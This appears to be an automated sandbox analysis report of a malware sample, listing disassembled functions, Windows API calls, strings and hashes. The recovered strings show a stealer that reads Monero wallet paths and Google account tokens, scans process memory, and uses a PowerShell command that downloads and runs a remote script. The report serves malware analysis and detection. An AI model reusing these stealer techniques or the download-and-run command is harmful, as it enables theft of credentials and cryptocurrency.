                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2507841554-0
                                                                                                                                                                        • Opcode ID: 4ec193fa2feb926c3e207808a3c19bd6a7e000660a7ec349e0e1840f6b822a1d
                                                                                                                                                                        • Instruction ID: c08891ce38132c3547cb02f5d33069ecbdb246550fe1cddcb6422894762df5cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ec193fa2feb926c3e207808a3c19bd6a7e000660a7ec349e0e1840f6b822a1d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B411AB1901128ABDF21AF60ED45BDA7BBCFB04315F1005A6FB09A6161DB309E858FA5
                                                                                                                                                                        Function 001A665D Relevance: 13.6, APIs: 9, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 001A6684
                                                                                                                                                                        • _free.LIBCMT ref: 001A6692
                                                                                                                                                                        • _free.LIBCMT ref: 001A669D
                                                                                                                                                                        • _free.LIBCMT ref: 001A6671
                                                                                                                                                                          • Part of subcall function 0019D98B: HeapFree.KERNEL32(00000000,00000000,?,0019D1D3,00000000,001BB6F4,0019D21A,0018EE93,?,?,0019D304,001BB6F4,?,?,001AEC88,001BB6F4), ref: 0019D9A1
                                                                                                                                                                          • Part of subcall function 0019D98B: GetLastError.KERNEL32(?,?,?,0019D304,001BB6F4,?,?,001AEC88,001BB6F4,?,?,?), ref: 0019D9B3
                                                                                                                                                                        • ___free_lc_time.LIBCMT ref: 001A66BB
                                                                                                                                                                        • _free.LIBCMT ref: 001A66C6
                                                                                                                                                                        • _free.LIBCMT ref: 001A66EB
                                                                                                                                                                        • _free.LIBCMT ref: 001A6702
                                                                                                                                                                        • _free.LIBCMT ref: 001A6711
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lc_time
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704779436-0
                                                                                                                                                                        • Opcode ID: 043201e2c37b0404a8f32b9aa27cd0eef1f5011780d2588a33a194a15a9e14e4
                                                                                                                                                                        • Instruction ID: 08783690665eeb711fdf97299c68dbe8083deb529513a245d2058d1f1443043c
                                                                                                                                                                        • Opcode Fuzzy Hash: 043201e2c37b0404a8f32b9aa27cd0eef1f5011780d2588a33a194a15a9e14e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 3711C4B6110701DBDF20BF65E886B99B3A5AB1271DF1C093AF10A97111CB30A850CA22
                                                                                                                                                                        Function 0018FB02 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0018FB27
                                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0018FB53
                                                                                                                                                                        • _memset.LIBCMT ref: 0018FB96
                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0018FCEC
                                                                                                                                                                          • Part of subcall function 0018F005: _memmove.LIBCMT ref: 0018F01F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenProcess_memmove_memset
                                                                                                                                                                        • String ID: N0ZWFt
                                                                                                                                                                        • API String ID: 2647191932-431618156
                                                                                                                                                                        • Opcode ID: 55fc93c48107c6b73c2ab6974843768a137af029b6e822c621839075f8a2ce8e
                                                                                                                                                                        • Instruction ID: f5ca72d35da8d704169d9a40f5fecc65adf9848f0dcc77bf83cb18e8be8e2323
                                                                                                                                                                        • Opcode Fuzzy Hash: 55fc93c48107c6b73c2ab6974843768a137af029b6e822c621839075f8a2ce8e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F516AB190022C9FCB24AF64CC85AEDB7B9AB54304F0101FEE609A7152EB716F89CF55
                                                                                                                                                                        Function 0018F8EA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0018FBB8,?,00000000,00000000,?,?), ref: 0018F909
                                                                                                                                                                        • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0018FBB8,?,00000000,00000000), ref: 0018F933
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0018F980
                                                                                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0018F9D9
                                                                                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0018FA31
                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0018FBB8,?,00000000,00000000,?,?), ref: 0018FA42
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessQueryReadVirtual
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 3835927879-2766056989
                                                                                                                                                                        • Opcode ID: 1fdece4b323df11bf66f57dfcf15f21933dd16b51529cc547ee18769f523712d
                                                                                                                                                                        • Instruction ID: c74b15f2a31672bed961c167102f22c454b9f4eb4249c08090496ea1ae935a04
                                                                                                                                                                        • Opcode Fuzzy Hash: 1fdece4b323df11bf66f57dfcf15f21933dd16b51529cc547ee18769f523712d
                                                                                                                                                                        • Instruction Fuzzy Hash: B7417C32A00209BBDF15AFA1DC49BEF7B76EB48764F148039FA04A6190D7758A52DF90
                                                                                                                                                                        Function 00181A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00181A65
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00181A6C
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00181AE9), ref: 00181A89
                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(00181AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00181AA4
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00181AE9), ref: 00181AAD
                                                                                                                                                                        Strings
                                                                                                                                                                        • SOFTWARE\monero-project\monero-core, xrefs: 00181A7F
                                                                                                                                                                        • wallet_path, xrefs: 00181A9C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                        • API String ID: 3466090806-4244082812
                                                                                                                                                                        • Opcode ID: 8707ab4d0f9b66b910982da5ab87f18220316a2bd1e9590dfd3a3341684d00d4
                                                                                                                                                                        • Instruction ID: caba3f27bd2b3776a1f161ac8e52bcdcd58c2d0e8af6f27d019b8b154f85ef64
                                                                                                                                                                        • Opcode Fuzzy Hash: 8707ab4d0f9b66b910982da5ab87f18220316a2bd1e9590dfd3a3341684d00d4
                                                                                                                                                                        • Instruction Fuzzy Hash: C0F05E76640304BFFB116B90EC0BFAE7F7CEB44B05F140125F701AA090D7B0AA409B20
                                                                                                                                                                        Function 001899E1 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 224stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00189B87
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 00189BA4
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00189C53
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00189C6E
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                        • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                        • API String ID: 3306365304-1713091031
                                                                                                                                                                        • Opcode ID: 1f8abbd26108f0ef2311e041ace06fbd39924b380e1fc4c6b76a26dffe1033a9
                                                                                                                                                                        • Instruction ID: 75f0551be4c61d3a7f8c4efdeb9f23ca5b057655b53c32c62cc9a363b78865c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f8abbd26108f0ef2311e041ace06fbd39924b380e1fc4c6b76a26dffe1033a9
                                                                                                                                                                        • Instruction Fuzzy Hash: 1B81A332D00119ABDF02FBA4ED469DDBBB4EF29305F524061F910B71A2DB71AE468F91
                                                                                                                                                                        Function 00192DB0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00191C1F: GetSystemTime.KERNEL32(?,001B66E2,?), ref: 00191C4E
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00192F00
                                                                                                                                                                        Strings
                                                                                                                                                                        • C:\ProgramData\, xrefs: 00192DE3
                                                                                                                                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00192E58
                                                                                                                                                                        • ')", xrefs: 00192E53
                                                                                                                                                                        • .ps1, xrefs: 00192E33
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192E9B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
